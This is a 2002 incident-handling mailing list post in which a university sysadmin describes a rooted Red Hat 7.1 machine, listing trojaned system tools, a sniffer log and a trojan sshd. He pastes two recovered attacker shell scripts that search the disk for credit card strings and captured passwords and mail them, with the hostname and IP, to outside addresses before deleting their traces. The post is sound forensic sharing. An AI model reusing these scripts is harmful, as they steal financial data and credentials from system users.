Security Incidents mailing list archives
qestions about a rooted RH7.1 box
From: Christopher Albert <sysadmin () DMS UMontreal CA>
Date: Fri, 12 Apr 2002 17:02:52 -0400
Greetings,One of the students here got his home box rooted last week. Before he reinstalled I asked him to let me have a look at his box, which I could only do remotely. I took a look at it yesterday for about twenty minutes and collected some stuff, but I had him pull it offline before grave-robber and I were finished because the box seemed just too poisoned and I wasn't comfortable staying connected. I have some questioned about what I found, and was wondering if the tools I found were from a familiar rootkit.
1. Most of the attack tools were in /usr/lib/.lib : libdi libdu libfh libne libnh libvd libdi = libvd # The 'ls' trojan libdu = # The 'top' trojan libne = # The 'netstat' trojan The 'ps' trojan was in : /usr/lib/libc/libp /usr/lib/sn : * .sys .X /usr/lib/ld : * chat .cv .X.X= # Sorts the output from LinSniffer 0.03 [BETA] by Mike Edulla <medulla () infosoc com>
and .sys was its output file. 'chat' seemed to be 'chattr' which was removed from the system..cv was the output of a script in /usr/man/.../ looking for credit card numbers /usr/man/.../: .c .m # I'll paste these scripts at the end, since they are revealing.
In addition, /usr/bin/kernel seemed to be a trojan sshd , running on ports 6010, 6011.
The scipts .c and .m are : /usr/man/... .c #!/bin/bash hh="r0ot () emoka ro" egrep -ir 'mastercard|visa' /home|egrep -v cache >> /usr/lib/ld/.cv egrep -ir 'mastercard|visa' /var|egrep -v cache >> /usr/lib/ld/.cv egrep -ir 'mastercard|visa' /root|egrep -v cache >> /usr/lib/ld/.cv if [ -d "/www" ]; then egrep -ir 'mastercard|visa' /www >> /usr/lib/ld/.cv fi if [ -d "/var/www" ]; then egrep -ir 'mastercard|visa' /var/www >> /usr/lib/ld/.cv fi if [ -f "/usr/lib/ld/.cv" ]; then/sbin/ifconfig | grep inet | awk '{print $2}'| cut -d: -f2 | grep -v "127.0.0." | grep -v "192.168.0." >> /usr/lib/ld/.cv
hostname -f >> /usr/lib/ld/.cv cat /usr/lib/ld/.cv | mail -s "cronmonthly" $hh rm &> /dev/null -rf /usr/lib/ld/.cv fi rm &> /dev/null -rf /usr/man/.../.c #!/bin/bash #/usr/man/.../.m # cs="blackeyero () yahoo com" dp="/usr/lib/ld" db="/usr/share/rht/..." wd="/usr/man/.../.w ml="/usr/man/.../.m if [ -f "$dp/.i" ]; then cat $dp/.i >> $dp/.pw fi if [ -f "$bla2/.o" ]; then cat $dp/.o >> $dp/.pw fi/sbin/ifconfig | grep inet | awk '{print $2}'| cut -d: -f2 | grep -v "127.0.0." | grep -v "192.168.0." >> $dp/.d
hostname -f >> $dp/.d cat $dp/.pw >> $dp/.d if [ -f "/etc/hosts" ]; then cat /etc/hosts >> $dp/.d fi cat $dp/.d | mail -s "cronstate" $cs cat $dp/.pw >> $db/.p rm &> /dev/null -rf $dp/.pw $dp/.d $wd $ml Thought this might be of interest to the group. Chris -- --------------------------------------------------------------------Christopher Albert Responsable des services informatiques
Departement de mathematiques et de statistiqueUniversite de Montreal
bureau 6188, Pavillon Andre-AisenstadtTel: (514) 343-2281 Fax: (514) 343-5700 --------------------------------------------------------------------
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service.For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- qestions about a rooted RH7.1 box Christopher Albert (Apr 14)